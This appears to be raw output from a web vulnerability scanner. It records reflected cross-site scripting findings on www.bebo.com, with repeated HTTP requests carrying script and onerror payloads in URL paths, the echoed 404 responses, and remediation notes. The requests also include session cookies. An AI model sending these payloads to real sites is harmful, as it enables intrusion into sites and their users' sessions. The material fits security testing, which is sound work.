GET /c/aol_auth/sgoe7b2e'%3b90c2b54f2da HTTP/1.1 Host: www.bebo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __gads=ID=1f0467ae1ad54ad4:T=1289859499:S=ALNI_MbQhi5fz7y_ZNdD_FY3zhuAH656GA; JSESSIONID=abcEhY4opCtSz7-xDNrXs; op604frontpagegum=mvt-no; bdaysession=1adec6239fa9957a482778003; __utmz=11070379.1289859453.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11070379.1993806272.1289859453.1289859453.1289859453.1; __utmc=11070379; __utmb=11070379.0.10.1289859453; bvid=aac15668-c04a-4e9c-88d0-457c07699eda|1289859489001; sessioncreate=20101115221809;
Response
HTTP/1.1 404 Not Found Server: Resin/3.0.24 Cache-Control: no-cache Pragma: No-cache Content-Language: us-US Content-Type: text/html; charset=UTF-8 Content-Length: 10303 Date: Mon, 15 Nov 2010 22:43:06 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4f17a'%3be3cf120dda1 was submitted in the REST URL parameter 2. This input was echoed as 4f17a';e3cf120dda1 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /c/apps4f17a'%3be3cf120dda1/browse_apps HTTP/1.1 Host: www.bebo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __gads=ID=1f0467ae1ad54ad4:T=1289859499:S=ALNI_MbQhi5fz7y_ZNdD_FY3zhuAH656GA; JSESSIONID=abcEhY4opCtSz7-xDNrXs; op604frontpagegum=mvt-no; bdaysession=1adec6239fa9957a482778003; __utmz=11070379.1289859453.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11070379.1993806272.1289859453.1289859453.1289859453.1; __utmc=11070379; __utmb=11070379.0.10.1289859453; bvid=aac15668-c04a-4e9c-88d0-457c07699eda|1289859489001; sessioncreate=20101115221809;
Response
HTTP/1.1 404 Not Found Server: Resin/3.0.24 Cache-Control: no-cache Pragma: No-cache Content-Language: us-US Content-Type: text/html; charset=UTF-8 Content-Length: 10615 Date: Mon, 15 Nov 2010 22:45:08 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e6a2"><img%20src%3da%20onerror%3dalert(1)>78f52f14a04 was submitted in the REST URL parameter 2. This input was echoed as 7e6a2"><img src=a onerror=alert(1)>78f52f14a04 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /c/apps7e6a2"><img%20src%3da%20onerror%3dalert(1)>78f52f14a04/browse_apps HTTP/1.1 Host: www.bebo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __gads=ID=1f0467ae1ad54ad4:T=1289859499:S=ALNI_MbQhi5fz7y_ZNdD_FY3zhuAH656GA; JSESSIONID=abcEhY4opCtSz7-xDNrXs; op604frontpagegum=mvt-no; bdaysession=1adec6239fa9957a482778003; __utmz=11070379.1289859453.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11070379.1993806272.1289859453.1289859453.1289859453.1; __utmc=11070379; __utmb=11070379.0.10.1289859453; bvid=aac15668-c04a-4e9c-88d0-457c07699eda|1289859489001; sessioncreate=20101115221809;
Response
HTTP/1.1 404 Not Found Server: Resin/3.0.24 Cache-Control: no-cache Pragma: No-cache Content-Language: es-ES Content-Type: text/html; charset=UTF-8 Content-Length: 9321 Date: Mon, 15 Nov 2010 22:45:08 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a5583'><script>alert(1)</script>665adb4858e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /c/appsa5583'><script>alert(1)</script>665adb4858e/browse_apps HTTP/1.1 Host: www.bebo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __gads=ID=1f0467ae1ad54ad4:T=1289859499:S=ALNI_MbQhi5fz7y_ZNdD_FY3zhuAH656GA; JSESSIONID=abcEhY4opCtSz7-xDNrXs; op604frontpagegum=mvt-no; bdaysession=1adec6239fa9957a482778003; __utmz=11070379.1289859453.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11070379.1993806272.1289859453.1289859453.1289859453.1; __utmc=11070379; __utmb=11070379.0.10.1289859453; bvid=aac15668-c04a-4e9c-88d0-457c07699eda|1289859489001; sessioncreate=20101115221809;
Response
HTTP/1.1 404 Not Found Server: Resin/3.0.24 Cache-Control: no-cache Pragma: No-cache Content-Language: us-US Content-Type: text/html; charset=UTF-8 Content-Length: 10826 Date: Mon, 15 Nov 2010 22:45:08 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a8f40<script>alert(1)</script>9321b08d940 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /c/appsa8f40<script>alert(1)</script>9321b08d940/browse_apps HTTP/1.1 Host: www.bebo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __gads=ID=1f0467ae1ad54ad4:T=1289859499:S=ALNI_MbQhi5fz7y_ZNdD_FY3zhuAH656GA; JSESSIONID=abcEhY4opCtSz7-xDNrXs; op604frontpagegum=mvt-no; bdaysession=1adec6239fa9957a482778003; __utmz=11070379.1289859453.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11070379.1993806272.1289859453.1289859453.1289859453.1; __utmc=11070379; __utmb=11070379.0.10.1289859453; bvid=aac15668-c04a-4e9c-88d0-457c07699eda|1289859489001; sessioncreate=20101115221809;
Response
HTTP/1.1 404 Not Found Server: Resin/3.0.24 Cache-Control: no-cache Pragma: No-cache Content-Language: us-US Content-Type: text/html; charset=UTF-8 Content-Length: 10808 Date: Mon, 15 Nov 2010 22:45:09 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
...[SNIP]... <div class="mod">ERROR 404: Sorry, we dont have no /c/appsa8f40<script>alert(1)</script>9321b08d940/browse_apps page, please try again.</div> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d8682"><img%20src%3da%20onerror%3dalert(1)>e0bf937f114 was submitted in the REST URL parameter 3. This input was echoed as d8682"><img src=a onerror=alert(1)>e0bf937f114 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /c/apps/browse_appsd8682"><img%20src%3da%20onerror%3dalert(1)>e0bf937f114 HTTP/1.1 Host: www.bebo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __gads=ID=1f0467ae1ad54ad4:T=1289859499:S=ALNI_MbQhi5fz7y_ZNdD_FY3zhuAH656GA; JSESSIONID=abcEhY4opCtSz7-xDNrXs; op604frontpagegum=mvt-no; bdaysession=1adec6239fa9957a482778003; __utmz=11070379.1289859453.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11070379.1993806272.1289859453.1289859453.1289859453.1; __utmc=11070379; __utmb=11070379.0.10.1289859453; bvid=aac15668-c04a-4e9c-88d0-457c07699eda|1289859489001; sessioncreate=20101115221809;
Response
HTTP/1.1 404 Not Found Server: Resin/3.0.24 Cache-Control: no-cache Pragma: No-cache Content-Language: us-US Content-Type: text/html; charset=UTF-8 Content-Length: 10558 Date: Mon, 15 Nov 2010 22:45:11 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 45970'><script>alert(1)</script>32a1c61c494 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /c/apps/browse_apps45970'><script>alert(1)</script>32a1c61c494 HTTP/1.1 Host: www.bebo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __gads=ID=1f0467ae1ad54ad4:T=1289859499:S=ALNI_MbQhi5fz7y_ZNdD_FY3zhuAH656GA; JSESSIONID=abcEhY4opCtSz7-xDNrXs; op604frontpagegum=mvt-no; bdaysession=1adec6239fa9957a482778003; __utmz=11070379.1289859453.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11070379.1993806272.1289859453.1289859453.1289859453.1; __utmc=11070379; __utmb=11070379.0.10.1289859453; bvid=aac15668-c04a-4e9c-88d0-457c07699eda|1289859489001; sessioncreate=20101115221809;
Response
HTTP/1.1 404 Not Found Server: Resin/3.0.24 Cache-Control: no-cache Pragma: No-cache Content-Language: us-US Content-Type: text/html; charset=UTF-8 Content-Length: 10464 Date: Mon, 15 Nov 2010 22:45:11 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 99ea8<img%20src%3da%20onerror%3dalert(1)>bfb2daec949 was submitted in the REST URL parameter 3. This input was echoed as 99ea8<img src=a onerror=alert(1)>bfb2daec949 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /c/apps/browse_apps99ea8<img%20src%3da%20onerror%3dalert(1)>bfb2daec949 HTTP/1.1 Host: www.bebo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __gads=ID=1f0467ae1ad54ad4:T=1289859499:S=ALNI_MbQhi5fz7y_ZNdD_FY3zhuAH656GA; JSESSIONID=abcEhY4opCtSz7-xDNrXs; op604frontpagegum=mvt-no; bdaysession=1adec6239fa9957a482778003; __utmz=11070379.1289859453.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11070379.1993806272.1289859453.1289859453.1289859453.1; __utmc=11070379; __utmb=11070379.0.10.1289859453; bvid=aac15668-c04a-4e9c-88d0-457c07699eda|1289859489001; sessioncreate=20101115221809;
Response
HTTP/1.1 404 Not Found Server: Resin/3.0.24 Cache-Control: no-cache Pragma: No-cache Content-Language: us-US Content-Type: text/html; charset=UTF-8 Content-Length: 10540 Date: Mon, 15 Nov 2010 22:45:13 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
...[SNIP]... <div class="lyt-multi">Could not find action: browse_apps99ea8<img src=a onerror=alert(1)>bfb2daec949.</div> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6e903'%3b6c2865e59c5 was submitted in the REST URL parameter 3. This input was echoed as 6e903';6c2865e59c5 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /c/apps/browse_apps6e903'%3b6c2865e59c5 HTTP/1.1 Host: www.bebo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __gads=ID=1f0467ae1ad54ad4:T=1289859499:S=ALNI_MbQhi5fz7y_ZNdD_FY3zhuAH656GA; JSESSIONID=abcEhY4opCtSz7-xDNrXs; op604frontpagegum=mvt-no; bdaysession=1adec6239fa9957a482778003; __utmz=11070379.1289859453.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11070379.1993806272.1289859453.1289859453.1289859453.1; __utmc=11070379; __utmb=11070379.0.10.1289859453; bvid=aac15668-c04a-4e9c-88d0-457c07699eda|1289859489001; sessioncreate=20101115221809;
Response
HTTP/1.1 404 Not Found Server: Resin/3.0.24 Cache-Control: no-cache Pragma: No-cache Content-Language: us-US Content-Type: text/html; charset=UTF-8 Content-Length: 10270 Date: Mon, 15 Nov 2010 22:45:11 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e2daa<script>alert(1)</script>1f98462b04c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /c/gamese2daa<script>alert(1)</script>1f98462b04c HTTP/1.1 Host: www.bebo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __gads=ID=1f0467ae1ad54ad4:T=1289859499:S=ALNI_MbQhi5fz7y_ZNdD_FY3zhuAH656GA; JSESSIONID=abcEhY4opCtSz7-xDNrXs; op604frontpagegum=mvt-no; bdaysession=1adec6239fa9957a482778003; __utmz=11070379.1289859453.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11070379.1993806272.1289859453.1289859453.1289859453.1; __utmc=11070379; __utmb=11070379.0.10.1289859453; bvid=aac15668-c04a-4e9c-88d0-457c07699eda|1289859489001; sessioncreate=20101115221809;
Response
HTTP/1.1 404 Not Found Server: Resin/3.0.24 Cache-Control: no-cache Pragma: No-cache Content-Language: us-US Content-Type: text/html; charset=UTF-8 Content-Length: 10709 Date: Mon, 15 Nov 2010 22:43:12 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
...[SNIP]... <div class="mod">ERROR 404: Sorry, we dont have no /c/gamese2daa<script>alert(1)</script>1f98462b04c page, please try again.</div> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 41c1d'><script>alert(1)</script>460634ba960 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /c/games41c1d'><script>alert(1)</script>460634ba960 HTTP/1.1 Host: www.bebo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __gads=ID=1f0467ae1ad54ad4:T=1289859499:S=ALNI_MbQhi5fz7y_ZNdD_FY3zhuAH656GA; JSESSIONID=abcEhY4opCtSz7-xDNrXs; op604frontpagegum=mvt-no; bdaysession=1adec6239fa9957a482778003; __utmz=11070379.1289859453.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11070379.1993806272.1289859453.1289859453.1289859453.1; __utmc=11070379; __utmb=11070379.0.10.1289859453; bvid=aac15668-c04a-4e9c-88d0-457c07699eda|1289859489001; sessioncreate=20101115221809;
Response
HTTP/1.1 404 Not Found Server: Resin/3.0.24 Cache-Control: no-cache Pragma: No-cache Content-Language: us-US Content-Type: text/html; charset=UTF-8 Content-Length: 10727 Date: Mon, 15 Nov 2010 22:43:11 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 24eee"><img%20src%3da%20onerror%3dalert(1)>14aea70584c was submitted in the REST URL parameter 2. This input was echoed as 24eee"><img src=a onerror=alert(1)>14aea70584c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /c/games24eee"><img%20src%3da%20onerror%3dalert(1)>14aea70584c HTTP/1.1 Host: www.bebo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __gads=ID=1f0467ae1ad54ad4:T=1289859499:S=ALNI_MbQhi5fz7y_ZNdD_FY3zhuAH656GA; JSESSIONID=abcEhY4opCtSz7-xDNrXs; op604frontpagegum=mvt-no; bdaysession=1adec6239fa9957a482778003; __utmz=11070379.1289859453.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11070379.1993806272.1289859453.1289859453.1289859453.1; __utmc=11070379; __utmb=11070379.0.10.1289859453; bvid=aac15668-c04a-4e9c-88d0-457c07699eda|1289859489001; sessioncreate=20101115221809;
Response
HTTP/1.1 404 Not Found Server: Resin/3.0.24 Cache-Control: no-cache Pragma: No-cache Content-Language: us-US Content-Type: text/html; charset=UTF-8 Content-Length: 10810 Date: Mon, 15 Nov 2010 22:43:11 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c8285'%3b4d5fdd7652d was submitted in the REST URL parameter 2. This input was echoed as c8285';4d5fdd7652d in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /c/gamesc8285'%3b4d5fdd7652d HTTP/1.1 Host: www.bebo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __gads=ID=1f0467ae1ad54ad4:T=1289859499:S=ALNI_MbQhi5fz7y_ZNdD_FY3zhuAH656GA; JSESSIONID=abcEhY4opCtSz7-xDNrXs; op604frontpagegum=mvt-no; bdaysession=1adec6239fa9957a482778003; __utmz=11070379.1289859453.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11070379.1993806272.1289859453.1289859453.1289859453.1; __utmc=11070379; __utmb=11070379.0.10.1289859453; bvid=aac15668-c04a-4e9c-88d0-457c07699eda|1289859489001; sessioncreate=20101115221809;
Response
HTTP/1.1 404 Not Found Server: Resin/3.0.24 Cache-Control: no-cache Pragma: No-cache Content-Language: us-US Content-Type: text/html; charset=UTF-8 Content-Length: 10516 Date: Mon, 15 Nov 2010 22:43:11 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 626db"><img%20src%3da%20onerror%3dalert(1)>76f4d607507 was submitted in the REST URL parameter 2. This input was echoed as 626db"><img src=a onerror=alert(1)>76f4d607507 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /c/invite626db"><img%20src%3da%20onerror%3dalert(1)>76f4d607507/join HTTP/1.1 Host: www.bebo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __gads=ID=1f0467ae1ad54ad4:T=1289859499:S=ALNI_MbQhi5fz7y_ZNdD_FY3zhuAH656GA; JSESSIONID=abcEhY4opCtSz7-xDNrXs; op604frontpagegum=mvt-no; bdaysession=1adec6239fa9957a482778003; __utmz=11070379.1289859453.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11070379.1993806272.1289859453.1289859453.1289859453.1; __utmc=11070379; __utmb=11070379.0.10.1289859453; bvid=aac15668-c04a-4e9c-88d0-457c07699eda|1289859489001; sessioncreate=20101115221809;
Response
HTTP/1.1 404 Not Found Server: Resin/3.0.24 Cache-Control: no-cache Pragma: No-cache Content-Language: us-US Content-Type: text/html; charset=UTF-8 Content-Length: 10864 Date: Mon, 15 Nov 2010 22:43:06 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 29a1a'><script>alert(1)</script>8145a15ce59 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /c/invite29a1a'><script>alert(1)</script>8145a15ce59/join HTTP/1.1 Host: www.bebo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __gads=ID=1f0467ae1ad54ad4:T=1289859499:S=ALNI_MbQhi5fz7y_ZNdD_FY3zhuAH656GA; JSESSIONID=abcEhY4opCtSz7-xDNrXs; op604frontpagegum=mvt-no; bdaysession=1adec6239fa9957a482778003; __utmz=11070379.1289859453.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11070379.1993806272.1289859453.1289859453.1289859453.1; __utmc=11070379; __utmb=11070379.0.10.1289859453; bvid=aac15668-c04a-4e9c-88d0-457c07699eda|1289859489001; sessioncreate=20101115221809;
Response
HTTP/1.1 404 Not Found Server: Resin/3.0.24 Cache-Control: no-cache Pragma: No-cache Content-Language: us-US Content-Type: text/html; charset=UTF-8 Content-Length: 10781 Date: Mon, 15 Nov 2010 22:43:06 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c8c29<script>alert(1)</script>c9d988c0b02 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /c/invitec8c29<script>alert(1)</script>c9d988c0b02/join HTTP/1.1 Host: www.bebo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __gads=ID=1f0467ae1ad54ad4:T=1289859499:S=ALNI_MbQhi5fz7y_ZNdD_FY3zhuAH656GA; JSESSIONID=abcEhY4opCtSz7-xDNrXs; op604frontpagegum=mvt-no; bdaysession=1adec6239fa9957a482778003; __utmz=11070379.1289859453.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11070379.1993806272.1289859453.1289859453.1289859453.1; __utmc=11070379; __utmb=11070379.0.10.1289859453; bvid=aac15668-c04a-4e9c-88d0-457c07699eda|1289859489001; sessioncreate=20101115221809;
Response
HTTP/1.1 404 Not Found Server: Resin/3.0.24 Cache-Control: no-cache Pragma: No-cache Content-Language: us-US Content-Type: text/html; charset=UTF-8 Content-Length: 10763 Date: Mon, 15 Nov 2010 22:43:07 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
...[SNIP]... <div class="mod">ERROR 404: Sorry, we dont have no /c/invitec8c29<script>alert(1)</script>c9d988c0b02/join page, please try again.</div> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9dbcc'%3b74725b6cc49 was submitted in the REST URL parameter 2. This input was echoed as 9dbcc';74725b6cc49 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /c/invite9dbcc'%3b74725b6cc49/join HTTP/1.1 Host: www.bebo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __gads=ID=1f0467ae1ad54ad4:T=1289859499:S=ALNI_MbQhi5fz7y_ZNdD_FY3zhuAH656GA; JSESSIONID=abcEhY4opCtSz7-xDNrXs; op604frontpagegum=mvt-no; bdaysession=1adec6239fa9957a482778003; __utmz=11070379.1289859453.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11070379.1993806272.1289859453.1289859453.1289859453.1; __utmc=11070379; __utmb=11070379.0.10.1289859453; bvid=aac15668-c04a-4e9c-88d0-457c07699eda|1289859489001; sessioncreate=20101115221809;
Response
HTTP/1.1 404 Not Found Server: Resin/3.0.24 Cache-Control: no-cache Pragma: No-cache Content-Language: us-US Content-Type: text/html; charset=UTF-8 Content-Length: 10570 Date: Mon, 15 Nov 2010 22:43:06 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 45bae'%3b0eeae6fcce9 was submitted in the REST URL parameter 3. This input was echoed as 45bae';0eeae6fcce9 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /c/invite/join45bae'%3b0eeae6fcce9 HTTP/1.1 Host: www.bebo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __gads=ID=1f0467ae1ad54ad4:T=1289859499:S=ALNI_MbQhi5fz7y_ZNdD_FY3zhuAH656GA; JSESSIONID=abcEhY4opCtSz7-xDNrXs; op604frontpagegum=mvt-no; bdaysession=1adec6239fa9957a482778003; __utmz=11070379.1289859453.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11070379.1993806272.1289859453.1289859453.1289859453.1; __utmc=11070379; __utmb=11070379.0.10.1289859453; bvid=aac15668-c04a-4e9c-88d0-457c07699eda|1289859489001; sessioncreate=20101115221809;
Response
